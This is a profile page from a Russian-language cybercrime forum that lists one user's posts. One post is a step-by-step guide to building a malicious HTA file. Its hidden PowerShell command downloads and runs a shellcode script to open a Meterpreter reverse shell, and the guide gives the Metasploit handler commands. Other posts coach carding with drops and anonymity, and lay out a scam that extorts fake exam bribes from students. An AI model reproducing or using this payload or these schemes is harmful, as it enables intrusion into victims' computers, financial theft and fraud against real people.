Серый

Постояльцы
  • Content Count

    7
  • Last visited

  • Days Won

    4

Серый last won the day on March 4 2018

Серый had the most liked content!

Community Reputation

-2 Плохой

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Начнём с того, что полной анонимности быть не может, если захотят, то тебя найдут, но что ты можешь сделать,чтобы тебя так искали? Я думаю ничего. Из-за того, что ты спиздишь у американцев баксов 500-1000$ искать тебя не будут. Для них это деньги, но не столь большие. Но это на значит, что ты можешь хуй забить и слать прямо на себя. Лучше все слать на дропов. Свои данные лишний раз не палить. Основа всех основ это впн без логов. Логи - грубо говоря это история, как в Браузере . Такой впн сложно найти, но реально. Нельзя использовать русские впн. Так, что минимум поставьте впн, зашифруйте свои данные, создавайте левые кошельки на левые симкарты. На моем канале, есть статьи про это. Ладно это лишь минимум самый, если писать все, то вы не сможете сделать сами, лучше позже напишу статью касаемо нормальной анонимности. Рассмотрим мои слова, которые я очень часто употребляю « не работайте в РФ и СНГ » В России 500$ деньги и за них тебя буду искать, скорее всего не найдут, но смысл больше риска? Если ты вышлешь с РФ шопа, оплатив рф картой к дропу, то угадай, что потом будет? Тебя сдаст дроп и пойдёт все по цепочки и выйдут на тебя. Так что ребята забудьте вы про работу в своей стране, тем более американцем то деньги банки возвращают , а нашим хуй кто что вернёт. Спасибо за внимание друзья .
  2. Теория HTML - язык гипертекстовой разметки текстов и не является языком программирования, но в Windows есть технология браузерного взаимодействия с документами /html. Это технология известная под названием HTML Application(HTA). Нам нужно знать только то, что HTA поддерживает исполнение сценариев с возможность выполнения "нужного" кода. Дополнительно можно почитать в сети. Для обработки приложений с форматом .hta используется стандартная улита mshta.exe. Она присвоена по умолчания и доступа во всех версиях Windows. Таким образом, достаточно передать необходимый файл целевому пользователю и он сможет запустить его с помощью стандартных средств. Введение Для начала необходимо создать пустой файл и поставить расширения .hta. После изменения формата можно его запустить и можно увидеть оконное приложение, которые ничего не выполняет. Создание и запуск файла Для примера напишем простой каркас страница, которая будет вызывать одно окно. Следует отметить, что HTA поддерживает скрипты VBScript и JavaScript. С помощью их можно добавлять разнообразные функции(исходник). Исходник с использованием скрипта VBScript Результат запуска Рабочая часть Начнем создавать вредоносный файл, который позволит получить сессию Meterpreter. Начнем с каркаса (исходник): Основа нашего приложения Далее необходимо подготовить запуск Powershell с помощью VBScript. Сделать можно с помощью 3 последовательных действий. Сначала нам необходимо скрыть запуск командной строки, для этого нужно отключить использования профиля powershell. Также необходимо отключить использование интерактивного режима и разрешить запуск сторонних скриптов. Это можно сделать с помощью этих команд: -w hidden -nop -noni -exec bypass 2. Далее необходимо интегрировать наш payload. Для этого будем использовать PowerSploit скрипт. Для этого программа выполнит скачивание и запуск его с выбранными параметрами. После -lhost необходимо указать IP цели и в -lport целевой порт: IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force 3. Конечная команда будем выглядеть таким образом: powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force Теперь нужно интерпретировать наши команды и добавить в конечный файл .hta(исходник): Финальная версия нашего файла Сохраняем файл на диску и будем использовать для передачи нашей цели. Создания сессия на Kali Linux Запустим сессию на Kali Linux и основные команды: msfconsole -q use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_https set LHOST 192.168.0.106 set LPORT 8007 run Создание сесиии Порты можно использовать разнообразные, например 8080, 4444 и другие. На скриншоте видно, что после открытия файла мы имеем удаленный доступ ко всем файлам и другим функциям. Заключение Вот с помощью такой технологии можно получить сессию. Используйте вместе с СИ и будет счастье. Также можно дополнить обработчик VBA и помещать более сложные трояны, кейлоггеры и т.д.
  3. Схемка работает только два раза в год: в зимнюю и летнюю сессии. Подготовительная работа: 1. Узнать расписание экзаменов 1 курса любого факультета любого ВУЗа. 2. Выяснить преподов, которые не берут взятки (социальные сети вам в помощь). В день консультации перед экзаменом прийти в ВУЗ и под любым предлогом поговорить с Честным Преподавателем. Цель - чтобы студенты увидели вас вместе. После этого всё совсем просто: подзываем любого студента/студентку (идеально старосту группы) и говорим примерно следующее: "Иван Иванович взяток не берет,но в честь Нового года/предстоящего отпуска готов пойти вам навстречу. Денег он, конечно, ни с кого не требует, но те, кто не уверен в своих знаниях могут подстраховаться. Вот вам номер киви кошелька, завтра утром Иван Иванович его посмотрит. Тройка - 1500, четверка - 2500, пятерка - 5000 рублей. В комментариях к платежу пишем свою фамилию, группу и желаемую оценку. На экзамен приходим и получаем оплаченную оценку. Если будете об этом трепаться - плохо будет всем. Всё понятно? Удачи на экзамене". Схема описана кратко в общих чертах. Схема рабочая. Дерзайте)
  4. 1 Ноября же уже ВПН и Тор закроют , ебануться
  5. Заказывал у ТС телевизор, привезли на почту в течении 2х недель посылка шла, работал через гарант сервис